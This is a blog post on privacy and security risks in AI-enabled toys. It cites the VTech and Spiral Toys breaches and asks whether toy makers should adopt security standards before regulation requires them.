Who is responsible for the data collected by toys? -10

The topic I have been blogging about is Artificial Intelligence in Toys, while writing the blogs I have been reading a lot of articles and watching a lot videos on this topic. One of the recurring themes in many of the articles and video are privacy and security concerns. There have been many notable security breach in the world of AI Toys, two of the most notable are VTech where 4,854,209 parent accounts and 6,368,509 related kid profiles were hacked, and spiral Toys, which had 2.2 million children’s voice recording and accounts hacked. Troy Hunt, a security expert credited with identifying the VTech security flaws, explains that many toys capable of performing AI functions, lack sufficient security and are vulnerable to hackers. Many of the same vulnerabilities that face the the internet of things face the “Internet of Toys”; microphones, cameras, personal data can be accessed giving hackers ability to match images, names, and the home address of children. Security expert Hunt explains that Hackers are able to gain control of toys through internet and Bluetooth connections giving them the ability to gain access remotely or in close proximity to the device. After several large scale data breaches consumer rights groups and privacy advocates have begun to file complaints alleging  that certain toy manufacturers have violated  several government and data privacy standards such as COPPA, The Children’s Online Privacy Protection Act that are aimed protecting consumers. Government agencies and Universities have published studies discussing the security vulnerabilities in the “Internet of Toys” but currently there is a lack regulation and oversight for toy manufacturers creating AI Toys.

This situation brings about some interesting ethical questions. Given the fact that the information regarding security risks is widely available, do toy manufacturers have a social responsibility to be proactive in implementing security standards and protocols? Or should they wait until there are laws requiring them to address security concerns? Proactively implementing security standards and protocols will increase production cost because extra time and resources are need to identify security risks and implement ways to prevent or fix them. However, not addressing the security concerns will put customers at risk. The law making process can be slow and laws may take a long time to implement, therefore it is possible that laws may not be able to keep up with the fast paced world of computer science. If the laws were not able to reflect the latest security flaws, then the toy manufacturers building those standards would always be vulnerable to any new threat not addressed in the laws. The security flaws in AI toys may put children’s lives at danger by giving hackers access to their voice recordings, photos, videos, and personal information such as phone number or address. To make matters more complex, currently there are no laws requiring toy manufacturers to disclose how their data is being secured or what is being used for. This mean there is no way for parents to know if their or their children’s data is being protected.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s